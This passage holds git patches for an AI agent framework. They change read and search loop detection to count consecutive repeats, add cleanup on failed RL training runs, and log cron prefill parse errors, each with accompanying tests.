+    # Notify the read-loop tracker when a non-read/search tool runs,
+    # so the *consecutive* counter resets (reads after other work are fine).
+    _READ_SEARCH_TOOLS = {"read_file", "search_files"}
+    if function_name not in _READ_SEARCH_TOOLS:
+        try:
+            from tools.file_tools import notify_other_tool_call
+            notify_other_tool_call(task_id or "default")
+        except Exception:
+            pass  # file_tools may not be loaded yet
+
     try:
         if function_name in _AGENT_LOOP_TOOLS:
             return json.dumps({"error": f"{function_name} must be handled by the agent loop"})
diff --git a/tests/tools/test_read_loop_detection.py b/tests/tools/test_read_loop_detection.py
index dfa1c1ab..a7c01170 100644
--- a/tests/tools/test_read_loop_detection.py
+++ b/tests/tools/test_read_loop_detection.py
@@ -3,12 +3,14 @@
 Tests for the read-loop detection mechanism in file_tools.
 
 Verifies that:
-1. Re-reading the same file region produces a warning
-2. Different regions/files don't trigger false warnings
-3. Task isolation works (different tasks have separate trackers)
-4. get_read_files_summary returns accurate history
-5. clear_read_tracker resets state
-6. Context compression injects file-read history
+1. Only *consecutive* identical reads trigger warnings/blocks
+2. Any other tool call in between resets the consecutive counter
+3. Warn on 3rd consecutive, block on 4th+
+4. Different regions/files/tasks don't trigger false warnings
+5. get_read_files_summary returns accurate history (unaffected by search keys)
+6. clear_read_tracker resets state
+7. notify_other_tool_call resets consecutive counters
+8. Context compression injects file-read history
 
 Run with:  python -m pytest tests/tools/test_read_loop_detection.py -v
 """
@@ -22,6 +24,7 @@ from tools.file_tools import (
     search_tool,
     get_read_files_summary,
     clear_read_tracker,
+    notify_other_tool_call,
     _read_tracker,
 )
 
@@ -57,7 +60,7 @@ def _make_fake_file_ops():
 
 
 class TestReadLoopDetection(unittest.TestCase):
-    """Verify that read_file_tool detects and warns on re-reads."""
+    """Verify that read_file_tool detects and warns on consecutive re-reads."""
 
     def setUp(self):
         clear_read_tracker()
@@ -72,50 +75,68 @@ class TestReadLoopDetection(unittest.TestCase):
         self.assertIn("content", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_second_read_same_region_has_warning(self, _mock_ops):
+    def test_second_consecutive_read_no_warning(self, _mock_ops):
+        """2nd consecutive read should NOT warn (threshold is 3)."""
         read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
         result = json.loads(
             read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
         )
-        self.assertIn("_warning", result)
-        self.assertIn("already read", result["_warning"])
-        self.assertIn("2 times", result["_warning"])
+        self.assertNotIn("_warning", result)
+        self.assertIn("content", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_third_read_is_blocked(self, _mock_ops):
-        """3rd read of the same region returns error, no content."""
+    def test_third_consecutive_read_has_warning(self, _mock_ops):
+        """3rd consecutive read of the same region triggers a warning."""
         for _ in range(2):
             read_file_tool("/tmp/test.py", task_id="t1")
         result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertIn("_warning", result)
+        self.assertIn("3 times", result["_warning"])
+        # Warning still returns content
+        self.assertIn("content", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_fourth_consecutive_read_is_blocked(self, _mock_ops):
+        """4th consecutive read of the same region is BLOCKED — no content."""
+        for _ in range(3):
+            read_file_tool("/tmp/test.py", task_id="t1")
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
         self.assertIn("error", result)
         self.assertIn("BLOCKED", result["error"])
+        self.assertIn("4 times", result["error"])
         self.assertNotIn("content", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_fourth_read_still_blocked(self, _mock_ops):
+    def test_fifth_consecutive_read_still_blocked(self, _mock_ops):
         """Subsequent reads remain blocked with incrementing count."""
-        for _ in range(3):
+        for _ in range(4):
             read_file_tool("/tmp/test.py", task_id="t1")
         result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
         self.assertIn("BLOCKED", result["error"])
-        self.assertIn("4 times", result["error"])
+        self.assertIn("5 times", result["error"])
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_different_region_no_warning(self, _mock_ops):
+    def test_different_region_resets_consecutive(self, _mock_ops):
+        """Reading a different region of the same file resets consecutive count."""
         read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
+        read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
+        # Now read a different region — this resets the consecutive counter
         result = json.loads(
             read_file_tool("/tmp/test.py", offset=501, limit=500, task_id="t1")
         )
         self.assertNotIn("_warning", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_different_file_no_warning(self, _mock_ops):
+    def test_different_file_resets_consecutive(self, _mock_ops):
+        """Reading a different file resets the consecutive counter."""
+        read_file_tool("/tmp/a.py", task_id="t1")
         read_file_tool("/tmp/a.py", task_id="t1")
         result = json.loads(read_file_tool("/tmp/b.py", task_id="t1"))
         self.assertNotIn("_warning", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
     def test_different_tasks_isolated(self, _mock_ops):
+        """Different task_ids have separate consecutive counters."""
         read_file_tool("/tmp/test.py", task_id="task_a")
         result = json.loads(
             read_file_tool("/tmp/test.py", task_id="task_b")
@@ -124,14 +145,63 @@ class TestReadLoopDetection(unittest.TestCase):
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
     def test_warning_still_returns_content(self, _mock_ops):
-        """Even with a warning, the file content is still returned."""
-        read_file_tool("/tmp/test.py", task_id="t1")
+        """Even with a warning (3rd read), the file content is still returned."""
+        for _ in range(2):
+            read_file_tool("/tmp/test.py", task_id="t1")
         result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
         self.assertIn("_warning", result)
         self.assertIn("content", result)
         self.assertIn("content of /tmp/test.py", result["content"])
 
 
+class TestNotifyOtherToolCall(unittest.TestCase):
+    """Verify that notify_other_tool_call resets the consecutive counter."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_other_tool_resets_consecutive(self, _mock_ops):
+        """After another tool runs, re-reading the same file is NOT consecutive."""
+        read_file_tool("/tmp/test.py", task_id="t1")
+        read_file_tool("/tmp/test.py", task_id="t1")
+        # Simulate a different tool being called
+        notify_other_tool_call("t1")
+        # This should be treated as a fresh read (consecutive reset)
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertNotIn("_warning", result)
+        self.assertIn("content", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_other_tool_prevents_block(self, _mock_ops):
+        """Agent can keep reading if other tools are used in between."""
+        for i in range(10):
+            read_file_tool("/tmp/test.py", task_id="t1")
+            notify_other_tool_call("t1")
+        # After 10 reads interleaved with other tools, still no warning
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertNotIn("_warning", result)
+        self.assertNotIn("error", result)
+        self.assertIn("content", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_notify_on_unknown_task_is_safe(self, _mock_ops):
+        """notify_other_tool_call on a task that hasn't read anything is a no-op."""
+        notify_other_tool_call("nonexistent_task")  # Should not raise
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_history_survives_notify(self, _mock_ops):
+        """notify_other_tool_call resets consecutive but preserves read_history."""
+        read_file_tool("/tmp/test.py", offset=1, limit=100, task_id="t1")
+        notify_other_tool_call("t1")
+        summary = get_read_files_summary("t1")
+        self.assertEqual(len(summary), 1)
+        self.assertEqual(summary[0]["path"], "/tmp/test.py")
+
+
 class TestReadFilesSummary(unittest.TestCase):
     """Verify get_read_files_summary returns accurate file-read history."""
 
@@ -183,6 +253,15 @@ class TestReadFilesSummary(unittest.TestCase):
         self.assertEqual(len(summary_b), 1)
         self.assertEqual(summary_b[0]["path"], "/tmp/b.py")
 
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_summary_unaffected_by_searches(self, _mock_ops):
+        """Searches should NOT appear in the file-read summary."""
+        read_file_tool("/tmp/test.py", task_id="t1")
+        search_tool("def main", task_id="t1")
+        summary = get_read_files_summary("t1")
+        self.assertEqual(len(summary), 1)
+        self.assertEqual(summary[0]["path"], "/tmp/test.py")
+
 
 class TestClearReadTracker(unittest.TestCase):
     """Verify clear_read_tracker resets state properly."""
@@ -211,10 +290,12 @@ class TestClearReadTracker(unittest.TestCase):
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
     def test_clear_then_reread_no_warning(self, _mock_ops):
-        read_file_tool("/tmp/test.py", task_id="t1")
+        for _ in range(3):
+            read_file_tool("/tmp/test.py", task_id="t1")
         clear_read_tracker("t1")
         result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
         self.assertNotIn("_warning", result)
+        self.assertNotIn("error", result)
 
 
 class TestCompressionFileHistory(unittest.TestCase):
@@ -256,7 +337,7 @@ class TestCompressionFileHistory(unittest.TestCase):
             {"role": "user", "content": "[CONTEXT SUMMARY]: Files were analyzed."},
             messages[-1],  # last user
         ]
-        mock_compressor.last_prompt_tokens = 5000
+        mock_compressor.last_prompt_tokens = 1000
 
         # Mock the agent's _compress_context dependencies
         mock_agent = MagicMock()
@@ -272,7 +353,7 @@ class TestCompressionFileHistory(unittest.TestCase):
         from run_agent import AIAgent
         result, _ = AIAgent._compress_context(
             mock_agent, messages, "system prompt",
-            approx_tokens=5000, task_id="compress_test",
+            approx_tokens=1000, task_id="compress_test",
         )
 
         # Find the injected file-read history message
@@ -291,7 +372,7 @@ class TestCompressionFileHistory(unittest.TestCase):
 
 
 class TestSearchLoopDetection(unittest.TestCase):
-    """Verify that search_tool detects and blocks repeated searches."""
+    """Verify that search_tool detects and blocks consecutive repeated searches."""
 
     def setUp(self):
         clear_read_tracker()
@@ -306,23 +387,38 @@ class TestSearchLoopDetection(unittest.TestCase):
         self.assertNotIn("error", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_second_search_has_warning(self, _mock_ops):
+    def test_second_consecutive_search_no_warning(self, _mock_ops):
+        """2nd consecutive search should NOT warn (threshold is 3)."""
         search_tool("def main", task_id="t1")
         result = json.loads(search_tool("def main", task_id="t1"))
-        self.assertIn("_warning", result)
-        self.assertIn("2 times", result["_warning"])
+        self.assertNotIn("_warning", result)
+        self.assertNotIn("error", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_third_search_is_blocked(self, _mock_ops):
+    def test_third_consecutive_search_has_warning(self, _mock_ops):
+        """3rd consecutive identical search triggers a warning."""
         for _ in range(2):
             search_tool("def main", task_id="t1")
         result = json.loads(search_tool("def main", task_id="t1"))
+        self.assertIn("_warning", result)
+        self.assertIn("3 times", result["_warning"])
+        # Warning still returns results
+        self.assertIn("matches", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_fourth_consecutive_search_is_blocked(self, _mock_ops):
+        """4th consecutive identical search is BLOCKED."""
+        for _ in range(3):
+            search_tool("def main", task_id="t1")
+        result = json.loads(search_tool("def main", task_id="t1"))
         self.assertIn("error", result)
         self.assertIn("BLOCKED", result["error"])
         self.assertNotIn("matches", result)
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_different_pattern_no_warning(self, _mock_ops):
+    def test_different_pattern_resets_consecutive(self, _mock_ops):
+        """A different search pattern resets the consecutive counter."""
+        search_tool("def main", task_id="t1")
         search_tool("def main", task_id="t1")
         result = json.loads(search_tool("class Foo", task_id="t1"))
         self.assertNotIn("_warning", result)
@@ -330,10 +426,32 @@ class TestSearchLoopDetection(unittest.TestCase):
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
     def test_different_task_isolated(self, _mock_ops):
+        """Different tasks have separate consecutive counters."""
         search_tool("def main", task_id="t1")
         result = json.loads(search_tool("def main", task_id="t2"))
         self.assertNotIn("_warning", result)
 
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_other_tool_resets_search_consecutive(self, _mock_ops):
+        """notify_other_tool_call resets search consecutive counter too."""
+        search_tool("def main", task_id="t1")
+        search_tool("def main", task_id="t1")
+        notify_other_tool_call("t1")
+        result = json.loads(search_tool("def main", task_id="t1"))
+        self.assertNotIn("_warning", result)
+        self.assertNotIn("error", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_read_between_searches_resets_consecutive(self, _mock_ops):
+        """A read_file call between searches resets search consecutive counter."""
+        search_tool("def main", task_id="t1")
+        search_tool("def main", task_id="t1")
+        # A read changes the last_key, resetting consecutive for the search
+        read_file_tool("/tmp/test.py", task_id="t1")
+        result = json.loads(search_tool("def main", task_id="t1"))
+        self.assertNotIn("_warning", result)
+        self.assertNotIn("error", result)
+
 
 class TestTodoInjectionFiltering(unittest.TestCase):
     """Verify that format_for_injection filters completed/cancelled todos."""
diff --git a/tools/code_execution_tool.py b/tools/code_execution_tool.py
index 401fc6ac..76a12dff 100644
--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -78,7 +78,7 @@ _TOOL_STUBS = {
     "web_extract": (
         "web_extract",
         "urls: list",
-        '"""Extract content from URLs. Returns dict with results list of {url, content, error}."""',
+        '"""Extract content from URLs. Returns dict with results list of {url, title, content, error}."""',
         '{"urls": urls}',
     ),
     "read_file": (
@@ -616,7 +616,7 @@ _TOOL_DOC_LINES = [
      "    Returns {\"data\": {\"web\": [{\"url\", \"title\", \"description\"}, ...]}}"),
     ("web_extract",
      "  web_extract(urls: list[str]) -> dict\n"
-     "    Returns {\"results\": [{\"url\", \"content\", \"error\"}, ...]} where content is markdown"),
+     "    Returns {\"results\": [{\"url\", \"title\", \"content\", \"error\"}, ...]} where content is markdown"),
     ("read_file",
      "  read_file(path: str, offset: int = 1, limit: int = 500) -> dict\n"
      "    Lines are 1-indexed. Returns {\"content\": \"...\", \"total_lines\": N}"),
diff --git a/tools/file_tools.py b/tools/file_tools.py
index cf5c1268..f498da25 100644
--- a/tools/file_tools.py
+++ b/tools/file_tools.py
@@ -15,7 +15,10 @@ _file_ops_lock = threading.Lock()
 _file_ops_cache: dict = {}
 
 # Track files read per task to detect re-read loops after context compression.
-# Key: task_id, Value: dict mapping (path, offset, limit) -> read count
+# Per task_id we store:
+#   "last_key":     the key of the most recent read/search call (or None)
+#   "consecutive":  how many times that exact call has been repeated in a row
+#   "read_history": set of (path, offset, limit) tuples for get_read_files_summary
 _read_tracker_lock = threading.Lock()
 _read_tracker: dict = {}
 
@@ -139,28 +142,37 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
             result.content = redact_sensitive_text(result.content)
         result_dict = result.to_dict()
 
-        # Track reads to detect re-read loops (e.g. after context compression)
-        read_key = (path, offset, limit)
+        # Track reads to detect *consecutive* re-read loops.
+        # The counter resets whenever any other tool is called in between,
+        # so only truly back-to-back identical reads trigger warnings/blocks.
+        read_key = ("read", path, offset, limit)
         with _read_tracker_lock:
-            task_reads = _read_tracker.setdefault(task_id, {})
-            task_reads[read_key] = task_reads.get(read_key, 0) + 1
-            count = task_reads[read_key]
+            task_data = _read_tracker.setdefault(task_id, {
+                "last_key": None, "consecutive": 0, "read_history": set(),
+            })
+            task_data["read_history"].add((path, offset, limit))
+            if task_data["last_key"] == read_key:
+                task_data["consecutive"] += 1
+            else:
+                task_data["last_key"] = read_key
+                task_data["consecutive"] = 1
+            count = task_data["consecutive"]
 
-        if count >= 3:
+        if count >= 4:
             # Hard block: stop returning content to break the loop
             return json.dumps({
                 "error": (
-                    f"BLOCKED: You have read this exact file region {count} times. "
+                    f"BLOCKED: You have read this exact file region {count} times in a row. "
                     "The content has NOT changed. You already have this information. "
                     "STOP re-reading and proceed with your task."
                 ),
                 "path": path,
                 "already_read": count,
             }, ensure_ascii=False)
-        elif count > 1:
+        elif count >= 3:
             result_dict["_warning"] = (
-                f"You have already read this exact file region {count} times in this session. "
-                "The content has not changed. Use the information you already have instead of re-reading. "
+                f"You have read this exact file region {count} times consecutively. "
+                "The content has not changed since your last read. Use the information you already have. "
                 "If you are stuck in a loop, stop reading and proceed with writing or responding."
             )
 
@@ -176,9 +188,10 @@ def get_read_files_summary(task_id: str = "default") -> list:
     compression boundaries.
     """
     with _read_tracker_lock:
-        task_reads = _read_tracker.get(task_id, {})
-        seen_paths = {}
-        for (path, offset, limit), count in task_reads.items():
+        task_data = _read_tracker.get(task_id, {})
+        read_history = task_data.get("read_history", set())
+        seen_paths: dict = {}
+        for (path, offset, limit) in read_history:
             if path not in seen_paths:
                 seen_paths[path] = []
             seen_paths[path].append(f"lines {offset}-{offset + limit - 1}")
@@ -189,7 +202,12 @@ def get_read_files_summary(task_id: str = "default") -> list:
 
 
 def clear_read_tracker(task_id: str = None):
-    """Clear the read tracker. Called when starting a new conversation."""
+    """Clear the read tracker.
+
+    Call with a task_id to clear just that task, or without to clear all.
+    Should be called when a session is destroyed to prevent memory leaks
+    in long-running gateway processes.
+    """
     with _read_tracker_lock:
         if task_id:
             _read_tracker.pop(task_id, None)
@@ -197,6 +215,22 @@ def clear_read_tracker(task_id: str = None):
             _read_tracker.clear()
 
 
+def notify_other_tool_call(task_id: str = "default"):
+    """Reset consecutive read/search counter for a task.
+
+    Called by the tool dispatcher (model_tools.py) whenever a tool OTHER
+    than read_file / search_files is executed.  This ensures we only warn
+    or block on *truly consecutive* repeated reads — if the agent does
+    anything else in between (write, patch, terminal, etc.) the counter
+    resets and the next read is treated as fresh.
+    """
+    with _read_tracker_lock:
+        task_data = _read_tracker.get(task_id)
+        if task_data:
+            task_data["last_key"] = None
+            task_data["consecutive"] = 0
+
+
 def write_file_tool(path: str, content: str, task_id: str = "default") -> str:
     """Write content to a file."""
     try:
@@ -245,17 +279,23 @@ def search_tool(pattern: str, target: str = "content", path: str = ".",
                 task_id: str = "default") -> str:
     """Search for content or files."""
     try:
-        # Track searches to detect repeated search loops
-        search_key = ("search", pattern, target, path, file_glob or "")
+        # Track searches to detect *consecutive* repeated search loops.
+        search_key = ("search", pattern, target, str(path), file_glob or "")
         with _read_tracker_lock:
-            task_reads = _read_tracker.setdefault(task_id, {})
-            task_reads[search_key] = task_reads.get(search_key, 0) + 1
-            count = task_reads[search_key]
+            task_data = _read_tracker.setdefault(task_id, {
+                "last_key": None, "consecutive": 0, "read_history": set(),
+            })
+            if task_data["last_key"] == search_key:
+                task_data["consecutive"] += 1
+            else:
+                task_data["last_key"] = search_key
+                task_data["consecutive"] = 1
+            count = task_data["consecutive"]
 
-        if count >= 3:
+        if count >= 4:
             return json.dumps({
                 "error": (
-                    f"BLOCKED: You have run this exact search {count} times. "
+                    f"BLOCKED: You have run this exact search {count} times in a row. "
                     "The results have NOT changed. You already have this information. "
                     "STOP re-searching and proceed with your task."
                 ),
@@ -274,9 +314,9 @@ def search_tool(pattern: str, target: str = "content", path: str = ".",
                     m.content = redact_sensitive_text(m.content)
         result_dict = result.to_dict()
 
-        if count > 1:
+        if count >= 3:
             result_dict["_warning"] = (
-                f"You have run this exact search {count} times in this session. "
+                f"You have run this exact search {count} times consecutively. "
                 "The results have not changed. Use the information you already have."
             )
 

From 03a4f184e6c7fc8ace13cd3a5a3a32fd1446021f Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 17:09:51 -0700
Subject: [PATCH 037/105] fix: call _stop_training_run on early-return failure
 paths

The 4 early-return paths in _spawn_training_run (API exit, trainer
exit, env not found, env exit) were doing manual process.terminate()
or returning without cleanup, leaking open log file handles. Now all
paths call _stop_training_run() which handles both process termination
and file handle closure.

Also adds 12 tests for _stop_training_run covering file handle
cleanup, process termination, status transitions, and edge cases.

Inspired by PR #715 (0xbyt4) which identified the early-return issue.
Core file handle fix was already on main via e28dc13 (memosr.eth).
---
 tests/tools/test_rl_training_tool.py | 142 +++++++++++++++++++++++++++
 tools/rl_training_tool.py            |  10 +-
 2 files changed, 146 insertions(+), 6 deletions(-)
 create mode 100644 tests/tools/test_rl_training_tool.py

diff --git a/tests/tools/test_rl_training_tool.py b/tests/tools/test_rl_training_tool.py
new file mode 100644
index 00000000..8b68ea8d
--- /dev/null
+++ b/tests/tools/test_rl_training_tool.py
@@ -0,0 +1,142 @@
+"""Tests for rl_training_tool.py — file handle lifecycle and cleanup.
+
+Verifies that _stop_training_run properly closes log file handles,
+terminates processes, and handles edge cases on failure paths.
+Inspired by PR #715 (0xbyt4).
+"""
+
+from unittest.mock import MagicMock
+
+import pytest
+
+from tools.rl_training_tool import RunState, _stop_training_run
+
+
+def _make_run_state(**overrides) -> RunState:
+    """Create a minimal RunState for testing."""
+    defaults = {
+        "run_id": "test-run-001",
+        "environment": "test_env",
+        "config": {},
+    }
+    defaults.update(overrides)
+    return RunState(**defaults)
+
+
+class TestStopTrainingRunFileHandles:
+    """Verify that _stop_training_run closes log file handles stored as attributes."""
+
+    def test_closes_all_log_file_handles(self):
+        state = _make_run_state()
+        files = {}
+        for attr in ("api_log_file", "trainer_log_file", "env_log_file"):
+            fh = MagicMock()
+            setattr(state, attr, fh)
+            files[attr] = fh
+
+        _stop_training_run(state)
+
+        for attr, fh in files.items():
+            fh.close.assert_called_once()
+            assert getattr(state, attr) is None
+
+    def test_clears_file_attrs_to_none(self):
+        state = _make_run_state()
+        state.api_log_file = MagicMock()
+
+        _stop_training_run(state)
+
+        assert state.api_log_file is None
+
+    def test_close_exception_does_not_propagate(self):
+        """If a file handle .close() raises, it must not crash."""
+        state = _make_run_state()
+        bad_fh = MagicMock()
+        bad_fh.close.side_effect = OSError("already closed")
+        good_fh = MagicMock()
+        state.api_log_file = bad_fh
+        state.trainer_log_file = good_fh
+
+        _stop_training_run(state)  # should not raise
+
+        bad_fh.close.assert_called_once()
+        good_fh.close.assert_called_once()
+
+    def test_handles_missing_file_attrs(self):
+        """RunState without log file attrs should not crash."""
+        state = _make_run_state()
+        # No log file attrs set at all — getattr(..., None) should handle it
+        _stop_training_run(state)  # should not raise
+
+
+class TestStopTrainingRunProcesses:
+    """Verify that _stop_training_run terminates processes correctly."""
+
+    def test_terminates_running_processes(self):
+        state = _make_run_state()
+        for attr in ("api_process", "trainer_process", "env_process"):
+            proc = MagicMock()
+            proc.poll.return_value = None  # still running
+            setattr(state, attr, proc)
+
+        _stop_training_run(state)
+
+        for attr in ("api_process", "trainer_process", "env_process"):
+            getattr(state, attr).terminate.assert_called_once()
+
+    def test_does_not_terminate_exited_processes(self):
+        state = _make_run_state()
+        proc = MagicMock()
+        proc.poll.return_value = 0  # already exited
+        state.api_process = proc
+
+        _stop_training_run(state)
+
+        proc.terminate.assert_not_called()
+
+    def test_handles_none_processes(self):
+        state = _make_run_state()
+        # All process attrs are None by default
+        _stop_training_run(state)  # should not raise
+
+    def test_handles_mixed_running_and_exited_processes(self):
+        state = _make_run_state()
+        # api still running
+        api = MagicMock()
+        api.poll.return_value = None
+        state.api_process = api
+        # trainer already exited
+        trainer = MagicMock()
+        trainer.poll.return_value = 0
+        state.trainer_process = trainer
+        # env is None
+        state.env_process = None
+
+        _stop_training_run(state)
+
+        api.terminate.assert_called_once()
+        trainer.terminate.assert_not_called()
+
+
+class TestStopTrainingRunStatus:
+    """Verify status transitions in _stop_training_run."""
+
+    def test_sets_status_to_stopped_when_running(self):
+        state = _make_run_state(status="running")
+        _stop_training_run(state)
+        assert state.status == "stopped"
+
+    def test_does_not_change_status_when_failed(self):
+        state = _make_run_state(status="failed")
+        _stop_training_run(state)
+        assert state.status == "failed"
+
+    def test_does_not_change_status_when_pending(self):
+        state = _make_run_state(status="pending")
+        _stop_training_run(state)
+        assert state.status == "pending"
+
+    def test_no_crash_with_no_processes_and_no_files(self):
+        state = _make_run_state()
+        _stop_training_run(state)  # should not raise
+        assert state.status == "pending"
diff --git a/tools/rl_training_tool.py b/tools/rl_training_tool.py
index bf4c6ad6..61b8a708 100644
--- a/tools/rl_training_tool.py
+++ b/tools/rl_training_tool.py
@@ -340,6 +340,7 @@ async def _spawn_training_run(run_state: RunState, config_path: Path):
         if run_state.api_process.poll() is not None:
             run_state.status = "failed"
             run_state.error_message = f"API server exited with code {run_state.api_process.returncode}. Check {api_log}"
+            _stop_training_run(run_state)
             return
         
         print(f"[{run_id}] Atropos API server started")
@@ -364,8 +365,7 @@ async def _spawn_training_run(run_state: RunState, config_path: Path):
         if run_state.trainer_process.poll() is not None:
             run_state.status = "failed"
             run_state.error_message = f"Trainer exited with code {run_state.trainer_process.returncode}. Check {trainer_log}"
-            if run_state.api_process:
-                run_state.api_process.terminate()
+            _stop_training_run(run_state)
             return
         
         print(f"[{run_id}] Trainer started, inference server on port 8001")
@@ -384,6 +384,7 @@ async def _spawn_training_run(run_state: RunState, config_path: Path):
         if not env_info:
             run_state.status = "failed"
             run_state.error_message = f"Environment '{run_state.environment}' not found"
+            _stop_training_run(run_state)
             return
         
         print(f"[{run_id}] Starting environment: {env_info.file_path} serve")
@@ -403,10 +404,7 @@ async def _spawn_training_run(run_state: RunState, config_path: Path):
         if run_state.env_process.poll() is not None:
             run_state.status = "failed"
             run_state.error_message = f"Environment exited with code {run_state.env_process.returncode}. Check {env_log}"
-            if run_state.trainer_process:
-                run_state.trainer_process.terminate()
-            if run_state.api_process:
-                run_state.api_process.terminate()
+            _stop_training_run(run_state)
             return
         
         run_state.status = "running"

From 2dddfce08c2007c4560e9448351f2ba0115a8eec Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 17:10:01 -0700
Subject: [PATCH 038/105] fix: log prefill parse errors + clean up cron
 scheduler tests
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Follow-up to PR #716 (0xbyt4):
- Log the third remaining silent except-pass in scheduler (prefill
  messages JSON parse failure)
- Fix test mock: run → run_conversation (matches actual agent API)
- Remove unused imports (asyncio, AsyncMock)
- Add test for prefill_messages parse failure logging
---
 cron/scheduler.py            |  3 ++-
 tests/cron/test_scheduler.py | 36 ++++++++++++++++++++++++++++++++----
 2 files changed, 34 insertions(+), 5 deletions(-)

diff --git a/cron/scheduler.py b/cron/scheduler.py
index 7675bbef..a8464cce 100644
--- a/cron/scheduler.py
+++ b/cron/scheduler.py
@@ -219,7 +219,8 @@ def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
                         prefill_messages = _json.load(_pf)
                     if not isinstance(prefill_messages, list):
                         prefill_messages = None
-                except Exception:
+                except Exception as e:
+                    logger.warning("Job '%s': failed to parse prefill messages file '%s': %s", job_id, pfpath, e)
                     prefill_messages = None
 
         # Max iterations
diff --git a/tests/cron/test_scheduler.py b/tests/cron/test_scheduler.py
index 6b817a28..824af11f 100644
--- a/tests/cron/test_scheduler.py
+++ b/tests/cron/test_scheduler.py
@@ -1,8 +1,8 @@
 """Tests for cron/scheduler.py — origin resolution, delivery routing, and error logging."""
 
-import asyncio
+import json
 import logging
-from unittest.mock import patch, MagicMock, AsyncMock
+from unittest.mock import patch, MagicMock
 
 import pytest
 
@@ -74,7 +74,6 @@ class TestRunJobConfigLogging:
 
     def test_bad_config_yaml_is_logged(self, caplog, tmp_path):
         """When config.yaml is malformed, a warning should be logged."""
-        # Create a bad config.yaml
         bad_yaml = tmp_path / "config.yaml"
         bad_yaml.write_text("invalid: yaml: [[[bad")
 
@@ -89,7 +88,7 @@ class TestRunJobConfigLogging:
              patch("dotenv.load_dotenv"), \
              patch("run_agent.AIAgent") as mock_agent_cls:
             mock_agent = MagicMock()
-            mock_agent.run.return_value = ("output doc", "final response")
+            mock_agent.run_conversation.return_value = {"final_response": "ok"}
             mock_agent_cls.return_value = mock_agent
 
             with caplog.at_level(logging.WARNING, logger="cron.scheduler"):
@@ -97,3 +96,32 @@ class TestRunJobConfigLogging:
 
         assert any("failed to load config.yaml" in r.message for r in caplog.records), \
             f"Expected 'failed to load config.yaml' warning in logs, got: {[r.message for r in caplog.records]}"
+
+    def test_bad_prefill_messages_is_logged(self, caplog, tmp_path):
+        """When the prefill messages file contains invalid JSON, a warning should be logged."""
+        # Valid config.yaml that points to a bad prefill file
+        config_yaml = tmp_path / "config.yaml"
+        config_yaml.write_text("prefill_messages_file: prefill.json\n")
+
+        bad_prefill = tmp_path / "prefill.json"
+        bad_prefill.write_text("{not valid json!!!")
+
+        job = {
+            "id": "test-job",
+            "name": "test",
+            "prompt": "hello",
+        }
+
+        with patch("cron.scheduler._hermes_home", tmp_path), \
+             patch("cron.scheduler._resolve_origin", return_value=None), \
+             patch("dotenv.load_dotenv"), \
+             patch("run_agent.AIAgent") as mock_agent_cls:
+            mock_agent = MagicMock()
+            mock_agent.run_conversation.return_value = {"final_response": "ok"}
+            mock_agent_cls.return_value = mock_agent
+
+            with caplog.at_level(logging.WARNING, logger="cron.scheduler"):
+                run_job(job)
+
+        assert any("failed to parse prefill messages" in r.message for r in caplog.records), \
+            f"Expected 'failed to parse prefill messages' warning in logs, got: {[r.message for r in caplog.records]}"

From 145c57fc01e164b9b09fa0c19ee7022af3e70b88 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 17:12:34 -0700
Subject: [PATCH 039/105] fix: provider selection not persisting when switching
 via hermes model
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Two related bugs prevented users from reliably switching providers:

1. OPENAI_BASE_URL poisoning OpenRouter resolution: When a user with a
